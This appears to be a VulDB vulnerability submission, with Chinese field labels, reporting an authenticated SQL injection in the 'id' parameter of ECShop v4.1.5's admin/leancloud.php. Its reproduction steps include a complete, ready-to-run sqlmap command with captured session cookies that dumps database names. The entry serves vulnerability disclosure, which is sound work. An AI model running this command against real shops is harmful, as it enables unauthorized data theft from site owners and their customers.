| 标题 | EcShop v4.1.5 SQL injection |
|---|
| 描述 | A vulnerability was discovered in Ecshop v4.1.5. After logging in to the system, the parameter id exists in leancloud.php, and the parameter id is not filtered normally, resulting in SQL injection. An attacker can exploit this vulnerability to obtain data.
1、First log in to the backend, then visit the page below and use burp to capture the packet and obtain the corresponding cookie.
/ECShop_V4.1.5/source/ecshop/admin/leancloud.php?id=123
Note: The cookie must be the following key-value pair. If one item is missing, it means that the correct package is not captured or it must be reconfigured.
2、Use sqlmap for injection testing, pay attention to replace the number in --cookie with the actual cookie, and finally obtain the data successfully.
sqlmap -u "http://172.16.214.182/ECShop_V4.1.5/source/ecshop/admin/leancloud.php?id=123" --data "act=resend" -p "id" --skip "act,cookie,user-agent,referer,host" --risk 3 --level 5 --dbms mysql --cookie "loginNum=1; ECS_LastCheckOrder=Thu%2C%2028%20Apr%202022%2013%3A16%3A49%20GMT; PHPSESSID=ebtmgof8q3bto0ai088fsvl4bh; ECS_ID=18d636b4644873c4fdb46cf3c4c2b135a912706e; ECS[visit_times]=1; ECSCP_ID=378bf619d7c9c9df588c937be89e20acd56e0821; Hm_lvt_154183a478f900f0163b2141ac4416a5=1651151808; Hm_lpvt_154183a478f900f0163b2141ac4416a5=1651151808" --dbs --flush-session --batch --random-agent |
|---|
| 来源 | ⚠️ https://github.com/xhcccan/code/issues/1 |
|---|
| 用户 | xhccan (UID 52599) |
|---|
| 提交 | 2023-09-24 12時14分 (3 年前) |
|---|
| 管理 | 2023-09-29 16時19分 (5 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 240924 [ECshop 4.1.5 /admin/leancloud.php 标识符 SQL注入] |
|---|
| 积分 | 20 |
|---|